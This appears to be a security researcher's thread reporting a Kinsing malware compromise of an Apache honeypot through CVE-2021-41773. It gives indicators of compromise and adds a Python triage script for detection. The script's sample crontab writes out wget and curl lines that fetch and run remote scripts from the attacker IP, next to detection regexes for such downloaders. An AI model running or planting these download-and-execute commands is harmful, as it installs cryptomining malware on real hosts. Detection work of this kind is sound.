Set up a honeypot last night that was vulnerable to CVE-2021-41773 #Apache code execution. Just got compromised. This is what happened.

IOCs in last tweet.
Attacker ran the following code through the CVE:
ap[.]sh does a bunch of stuff, including:
- Downloads 2 files from the same IP - kinsing and libsystem[.]so
- Executes kinsing
...
ap[.]sh also:
- tries to put libsystem[.]so into /etc/ld.so.preload (Dynamic Linker Hijacking - T1574.006)
- kills multiple processes/cron tasks
- adds a backdoor cron job which downloads ap[.]sh from 185[.]191[.]32[.]198 (IP no longer up)
Third file is created when kinsing executes (I think) - kdevtmpfsi

All 3 files were in /tmp but may also attempt to put in /dev

All 3 hashes (at end) are on VT
Found another crontab that downloads unk[.]sh from 185[.]191[.]32[.]198
kinsing and kdevtmpfsi are running. They are both connecting out to multiple IPs and kinsing is listening on TCP/31458
IOC:
195[.]19[.]192[.]28
185[.]191[.]32[.]198
194[.]87[.]102[.]77
193[.]164[.]150[.]99
ap[.]sh (MD5 539ce9f7582c5382a552545eb3f5819a)
kinsing (648effa354b3cbaad87b45f48d59c616)
libsystem[.]so (ccef46c7edf9131ccffc47bd69eb743b)
kdevtmpfsi (8c6681daba966addd295ad89bf5146af)
Coworker @StevenErwin found this which is pretty much what I'm seeing on the system: trendmicro.com/en_ca/research…
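A triage script for the artifacts the thread describes, added here as an example; it is not the thread author's tooling and was not run on the honeypot. It takes the thread's IOCs (the four IPs, the four MD5s, the dropped filenames, the TCP/31458 listener, the ld.so.preload entry and the downloader cron job) and checks them against collected host artifacts. The SAMPLE_* inputs are constructed to look like a crontab, /etc/ld.so.preload, `ss -tnap` and `md5sum` output from an infected host; the regexes, the extra drop directories (/var/tmp, /dev/shm), the 10.0.0.5 host, the pids and every hash other than the four IOCs are assumptions.

```python
"""Offline triage of host artifacts against the Kinsing IOCs in the thread.

Added example, not the thread author's tooling. SAMPLE_* values are constructed
to look like a crontab, /etc/ld.so.preload, `ss -tnap` and `md5sum` output from
an infected host; they were not captured from the honeypot.
"""
import re

# IOCs from the thread, with the defanging removed so they can be matched.
IOC_IPS = {"195.19.192.28", "185.191.32.198", "194.87.102.77", "193.164.150.99"}
IOC_MD5 = {
    "539ce9f7582c5382a552545eb3f5819a": "ap.sh",
    "648effa354b3cbaad87b45f48d59c616": "kinsing",
    "ccef46c7edf9131ccffc47bd69eb743b": "libsystem.so",
    "8c6681daba966addd295ad89bf5146af": "kdevtmpfsi",
}
IOC_NAMES = {"ap.sh", "unk.sh", "kinsing", "libsystem.so", "kdevtmpfsi"}
IOC_PORTS = {31458}
# /tmp and /dev are from the thread; /var/tmp and /dev/shm are an assumption.
DROP_DIRS = ("/tmp/", "/dev/", "/var/tmp/", "/dev/shm/")


def check_ld_preload(text):
    """Every active entry in ld.so.preload (T1574.006); a clean host normally has none."""
    lines = (l.strip() for l in text.splitlines())
    return [l for l in lines if l and not l.startswith("#")]


FETCH_RE = re.compile(r"\b(?:curl|wget)\b.*?\b(?:https?://)?(\d{1,3}(?:\.\d{1,3}){3})")
PIPE_SH_RE = re.compile(r"\|\s*(?:ba)?sh\b")


def check_crontab(text):
    """(entry, reason) for cron jobs that fetch from an IOC IP or pipe a download into a shell."""
    findings = []
    for entry in (l.strip() for l in text.splitlines()):
        if not entry or entry.startswith("#"):
            continue
        m = FETCH_RE.search(entry)
        if m and m.group(1) in IOC_IPS:
            findings.append((entry, "downloads from IOC IP " + m.group(1)))
        elif m and PIPE_SH_RE.search(entry):
            findings.append((entry, "pipes a download into a shell"))
    return findings


# One `ss -tnap` row: state, queues, local addr:port, peer addr:port, owning process.
SS_RE = re.compile(r'^(LISTEN|ESTAB)\s+\d+\s+\d+\s+\S+:(\d+)\s+(\S+):\S+\s+users:\(\("([^"]+)",pid=(\d+)')


def check_sockets(text):
    """Sockets owned by an IOC process, listening on an IOC port, or connected to an IOC IP."""
    findings = []
    for m in filter(None, (SS_RE.match(l.strip()) for l in text.splitlines())):
        state, lport, peer, proc, pid = m.group(1), int(m.group(2)), m.group(3), m.group(4), int(m.group(5))
        reasons = []
        if proc in IOC_NAMES:
            reasons.append("IOC process name")
        if state == "LISTEN" and lport in IOC_PORTS:
            reasons.append("listening on IOC port %d" % lport)
        if peer in IOC_IPS:
            reasons.append("connected to IOC IP " + peer)
        if reasons:
            findings.append({"pid": pid, "process": proc, "state": state, "peer": peer, "reasons": reasons})
    return findings


MD5SUM_RE = re.compile(r"^([0-9a-fA-F]{32})\s+\*?(.+)$")


def check_hashes(text):
    """Match md5sum output against the IOC hashes; an IOC filename in a drop dir is flagged
    even when the hash differs, because the dropped binaries change between campaigns."""
    findings = []
    for m in filter(None, (MD5SUM_RE.match(l.strip()) for l in text.splitlines())):
        digest, path = m.group(1).lower(), m.group(2)
        if digest in IOC_MD5:
            findings.append((path, "md5 matches IOC " + IOC_MD5[digest]))
        elif path.startswith(DROP_DIRS) and path.rsplit("/", 1)[-1] in IOC_NAMES:
            findings.append((path, "IOC filename in drop directory, hash differs"))
    return findings


def triage(ld_preload, crontab, ss_out, md5sum_out):
    """Run every check; a host is clean only if every list is empty."""
    return {"ld.so.preload": check_ld_preload(ld_preload), "crontab": check_crontab(crontab),
            "sockets": check_sockets(ss_out), "hashes": check_hashes(md5sum_out)}


# Constructed samples: hashes other than the four IOCs, the 10.0.0.5 host and all pids are made up.
SAMPLE_LD_PRELOAD = "# dropped by ap.sh\n/tmp/libsystem.so\n"
SAMPLE_CRONTAB = """# m h dom mon dow command
0 3 * * * /usr/bin/apt-get update
* * * * * wget -q -O - http://185.191.32.198/ap.sh | sh > /dev/null 2>&1
*/5 * * * * curl -fsSL http://10.0.0.5/x.sh | bash
"""
SAMPLE_SS = """State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0      128    0.0.0.0:22         0.0.0.0:*         users:(("sshd",pid=811,fd=3))
LISTEN 0      128    0.0.0.0:31458      0.0.0.0:*         users:(("kinsing",pid=2241,fd=5))
ESTAB  0      0      10.0.2.15:49822    194.87.102.77:80  users:(("kdevtmpfsi",pid=2250,fd=9))
"""
SAMPLE_MD5SUM = """539ce9f7582c5382a552545eb3f5819a  /tmp/ap.sh
648effa354b3cbaad87b45f48d59c616  /tmp/kinsing
ccef46c7edf9131ccffc47bd69eb743b  /tmp/libsystem.so
0123456789abcdef0123456789abcdef  /dev/kdevtmpfsi
d41d8cd98f00b204e9800998ecf8427e  /usr/bin/ls
"""

if __name__ == "__main__":
    for artifact, hits in triage(SAMPLE_LD_PRELOAD, SAMPLE_CRONTAB, SAMPLE_SS, SAMPLE_MD5SUM).items():
        print(artifact, "->", hits or "clean")
```

On a live host, feed it `cat /etc/ld.so.preload`, the root and per-user crontabs plus /etc/cron.d, `ss -tnap` and `md5sum /tmp/* /dev/*` (or a wider file walk). The hash match is the weakest check in the set: it only catches the exact binaries from this campaign, which is why the filename-in-drop-dir, ld.so.preload and cron checks are there.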

Thread by Tyler Hudak (@SecShoggoth)